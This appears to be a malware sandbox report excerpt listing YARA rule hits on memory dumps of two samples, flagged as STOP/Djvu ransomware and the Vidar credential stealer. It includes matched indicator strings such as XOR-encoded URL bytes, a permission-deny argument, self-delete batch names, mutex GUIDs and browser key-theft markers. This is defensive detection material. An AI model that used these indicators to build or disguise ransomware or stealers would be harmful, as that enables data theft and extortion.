8.0.Q5W0I0pzFI.exe.400000.6.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
8.0.Q5W0I0pzFI.exe.400000.6.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.0.Q5W0I0pzFI.exe.400000.6.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
15.2.Q5W0I0pzFI.exe.22215a0.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
15.2.Q5W0I0pzFI.exe.22215a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
15.2.Q5W0I0pzFI.exe.22215a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
11.2.Q5W0I0pzFI.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
11.2.Q5W0I0pzFI.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.2.Q5W0I0pzFI.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.0.Q5W0I0pzFI.exe.400000.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
9.0.Q5W0I0pzFI.exe.400000.4.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.0.Q5W0I0pzFI.exe.400000.4.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.2.build2.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.build2.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
16.2.build2.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x92dbc:$s1: JohnDoe 0x92db4:$s2: HAL9TH
16.2.build2.exe.400000.0.raw.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x970c0:$s1: "os_crypt":{"encrypted_key":" 0x9c9ec:$s2: screenshot.jpg 0x92edc:$s3: Content-Disposition: form-data; name="
9.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
9.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.0.build2.exe.400000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.0.build2.exe.400000.8.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
16.0.build2.exe.400000.8.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x919bc:$s1: JohnDoe 0x919b4:$s2: HAL9TH
16.0.build2.exe.400000.8.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x95cc0:$s1: "os_crypt":{"encrypted_key":" 0x9b5ec:$s2: screenshot.jpg 0x91adc:$s3: Content-Disposition: form-data; name="
11.0.Q5W0I0pzFI.exe.400000.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
11.0.Q5W0I0pzFI.exe.400000.4.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.0.Q5W0I0pzFI.exe.400000.4.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.0.Q5W0I0pzFI.exe.400000.9.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
2.0.Q5W0I0pzFI.exe.400000.9.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.Q5W0I0pzFI.exe.400000.9.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
11.0.Q5W0I0pzFI.exe.400000.7.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
11.0.Q5W0I0pzFI.exe.400000.7.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.0.Q5W0I0pzFI.exe.400000.7.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.0.build2.exe.400000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.0.build2.exe.400000.5.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
16.0.build2.exe.400000.5.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x919bc:$s1: JohnDoe 0x919b4:$s2: HAL9TH
16.0.build2.exe.400000.5.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x95cc0:$s1: "os_crypt":{"encrypted_key":" 0x9b5ec:$s2: screenshot.jpg 0x91adc:$s3: Content-Disposition: form-data; name="
8.0.Q5W0I0pzFI.exe.400000.10.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
8.0.Q5W0I0pzFI.exe.400000.10.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.0.Q5W0I0pzFI.exe.400000.10.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.0.Q5W0I0pzFI.exe.400000.10.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
17.0.Q5W0I0pzFI.exe.400000.10.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.0.Q5W0I0pzFI.exe.400000.10.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
8.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.0.Q5W0I0pzFI.exe.400000.9.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
9.0.Q5W0I0pzFI.exe.400000.9.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.0.Q5W0I0pzFI.exe.400000.9.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
7.2.Q5W0I0pzFI.exe.22115a0.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xdf7ea:$s1: http:// 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101b2b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xdf7ea:$f1: http://
7.2.Q5W0I0pzFI.exe.22115a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
7.2.Q5W0I0pzFI.exe.22115a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.0.Q5W0I0pzFI.exe.400000.10.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
2.0.Q5W0I0pzFI.exe.400000.10.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.Q5W0I0pzFI.exe.400000.10.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.0.build2.exe.400000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.0.build2.exe.400000.6.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
16.0.build2.exe.400000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x92dbc:$s1: JohnDoe 0x92db4:$s2: HAL9TH
16.0.build2.exe.400000.6.raw.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x970c0:$s1: "os_crypt":{"encrypted_key":" 0x9c9ec:$s2: screenshot.jpg 0x92edc:$s3: Content-Disposition: form-data; name="
2.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
2.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
17.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
